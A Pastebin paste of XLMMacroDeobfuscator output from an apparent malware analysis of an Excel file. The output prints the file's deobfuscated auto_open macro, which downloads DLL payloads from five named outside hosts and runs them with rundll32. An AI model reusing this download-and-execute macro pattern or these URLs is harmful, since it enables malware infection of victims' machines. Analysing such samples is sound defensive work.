Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\41289e01a9a971d5b7372a8bfa255ef2503ebbf8f2313223eae09ce4318e51b2
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\41289e01a9a971d5b7372a8bfa255ef2503ebbf8f2313223eae09ce4318e51b2
- Unrecognized file format
- Unencrypted xls file
- [Loading Cells]
- auto_open: auto_open->'Klops'!$A$154
- [Starting Deobfuscation]
- CELL:A154 , FullEvaluation , C153()
- CELL:C164 , FullEvaluation , GOTO(D153)
- CELL:D153 , FullEvaluation , =REGISTER("URLMon","URLDownloadToFileA","IICCBB","Niokaser",1,9)
- CELL:D154 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"http://finpremium.ru/jlbmvdewvq/=<<Name #0 in external(?) file #2>>(111111.0,999999.0)&"".jpg""","..\GTOLS.BBDDFF",0,0)
- CELL:D155 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"http://toletnewchandigarh.com/dlhkadi/=<<Name #0 in external(?) file #2>>(111111.0,999999.0)&"".jpg""","..\GTOLS.BBDDFF1",0,0)
- CELL:D156 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"http://digitalmarketingcourseinvadodara.com/bpskramhj/=<<Name #0 in external(?) file #2>>(111111.0,999999.0)&"".jpg""","..\GTOLS.BBDDFF2",0,0)
- CELL:D157 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"http://nativewriters.us/buaknxamhmhb/=<<Name #0 in external(?) file #2>>(111111.0,999999.0)&"".jpg""","..\GTOLS.BBDDFF3",0,0)
- CELL:D158 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"http://hiranandanirise.com/zezprnimexk/=<<Name #0 in external(?) file #2>>(111111.0,999999.0)&"".jpg""","..\GTOLS.BBDDFF4",0,0)
- CELL:D164 , FullEvaluation , GOTO(B153)
- CELL:B153 , PartialEvaluation , =EXEC("rundll32 ..\GTOLS.BBDDFF,DllRegisterServer")
- CELL:B154 , PartialEvaluation , =EXEC("rundll32 ..\GTOLS.BBDDFF1,DllRegisterServer")
- CELL:B155 , PartialEvaluation , =EXEC("rundll32 ..\GTOLS.BBDDFF2,DllRegisterServer")
- CELL:B156 , PartialEvaluation , =EXEC("rundll32 ..\GTOLS.BBDDFF3,DllRegisterServer")
- CELL:B157 , PartialEvaluation , =EXEC("rundll32 ..\GTOLS.BBDDFF4,DllRegisterServer")
- CELL:B164 , End , HALT()
- Files:
- [END of Deobfuscation]
- time elapsed: 0.5057058334350586
- Process finished with exit code 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
